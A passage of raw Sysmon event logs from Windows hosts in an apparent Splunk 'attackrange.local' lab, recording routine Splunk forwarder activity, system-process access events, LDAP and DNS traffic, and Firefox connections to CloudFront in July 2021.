Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001053181Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:03:53.843{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CC179CACA96E2061A56913CDE2E1360D,SHA256=BE0B8D84E92B66535AD34F2F0F5DBFBAE8DB982F123E5D4399EEF3172F592F00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053180Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:53.745{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7698FE6DBC874910E55920E8CC45DB8,SHA256=CC466007FB3CD449CBD698AB8E6DBD71184860F4043C1A3B1EA46F9068490DD8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053179Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:53.745{466BC892-F769-60EB-C87D-00000000CF01}11489720C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000809679Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:53.354{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=153FA9FDCB8B0190889849A87A228EDD,SHA256=EA766D617FC5548AE86D8B53D99F0BBEB6AA00729AEDAB2B6D7052873DBAA26D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053178Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:53.489{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F769-60EB-C87D-00000000CF01}1148C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053177Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:53.489{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053176Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:03:53.489{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053175Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:53.489{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F769-60EB-C87D-00000000CF01}1148C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053174Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:03:53.489{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053173Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:53.489{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053172Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:53.489{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F769-60EB-C87D-00000000CF01}1148C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053171Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:53.475{466BC892-F769-60EB-C87D-00000000CF01}1148C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000809678Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:03:51.220{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57413-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001053198Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:54.757{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3AE4B0BE5142024F66353B010EFBF9A,SHA256=33D0A763B58E4B9F1F63DC3F49990EA681264A6CEBF62296118C04294432442C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809680Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:54.354{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A4207E7E433BD1D0161F166EC5D80A9,SHA256=C6665E4650612D9DF7BF009B77F80160BA70FB53B68521CD9B5C6DDE137030AE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053197Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:46.658{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61909-false10.0.1.12-8000- 354300x80000000000000001053196Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:46.448{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT 
AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local61908-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001053195Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:46.448{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local61908-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001053194Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:46.440{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local61907-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001053193Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:46.440{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local61907-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001053192Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:46.420{466BC892-02AF-60E8-0D00-00000000CF01}900C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local61906-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local135epmap 354300x80000000000000001053191Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:46.420{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local61906-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local135epmap 
23542300x80000000000000001053190Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:54.589{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\axpgvkas.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053189Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:54.173{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F76A-60EB-C97D-00000000CF01}8484C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053188Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:54.173{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001053187Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:54.173{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053186Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:54.173{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053185Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:03:54.173{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053184Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:54.173{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F76A-60EB-C97D-00000000CF01}8484C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053183Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:54.173{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F76A-60EB-C97D-00000000CF01}8484C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053182Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:54.129{466BC892-F76A-60EB-C97D-00000000CF01}8484C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x80000000000000001053208Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:54.106{466BC892-3152-60E8-240B-00000000CF01}3328d2nxq2uap88usk.cloudfront.net02600:9000:2156:3e00:a:da5e:7900:93a1;2600:9000:2156:5000:a:da5e:7900:93a1;2600:9000:2156:2600:a:da5e:7900:93a1;2600:9000:2156:4200:a:da5e:7900:93a1;2600:9000:2156:9600:a:da5e:7900:93a1;2600:9000:2156:5600:a:da5e:7900:93a1;2600:9000:2156:5a00:a:da5e:7900:93a1;2600:9000:2156:9400:a:da5e:7900:93a1;C:\Program Files\Mozilla Firefox\firefox.exe 
22542200x80000000000000001053207Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:54.102{466BC892-3152-60E8-240B-00000000CF01}3328d2nxq2uap88usk.cloudfront.net013.32.25.69;13.32.25.81;13.32.25.96;13.32.25.34;C:\Program Files\Mozilla Firefox\firefox.exe 23542300x80000000000000001053206Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:55.772{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81AFFF26832A3E9915E68B8A1389945B,SHA256=456C5EF90C29812CAD4F73EB3DAA3607723CEF5957CF1D5DABF3C68855D1B1D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809681Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:55.373{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1412ACE3C180A00558063EEFCDF12AE,SHA256=929AE0050EB03E0716B7309D3B2D4F294CCC02616E7C898B3E732BC0DCA1936F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053205Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:47.641{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local58271- 354300x80000000000000001053204Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:47.640{466BC892-3152-60E8-240B-00000000CF01}3328C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-890.attackrange.local61911-false13.32.25.34server-13-32-25-34.fra56.r.cloudfront.net443https 
354300x80000000000000001053203Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:47.637{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local58233- 354300x80000000000000001053202Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:47.584{466BC892-3152-60E8-240B-00000000CF01}3328C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-890.attackrange.local61910-false143.204.205.100server-143-204-205-100.fra53.r.cloudfront.net443https 23542300x80000000000000001053201Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:55.641{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\axpgvkas.default-release\broadcast-listeners.jsonMD5=E31DDAC0F78D87A5E4FA70F31042EDF1,SHA256=4F65E04348C667AABB7FA1085CF8A78D4D8DDAB4F4E50F166A79CE65C9CBC630,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053200Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:47.580{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local58173- 23542300x80000000000000001053199Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:55.142{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 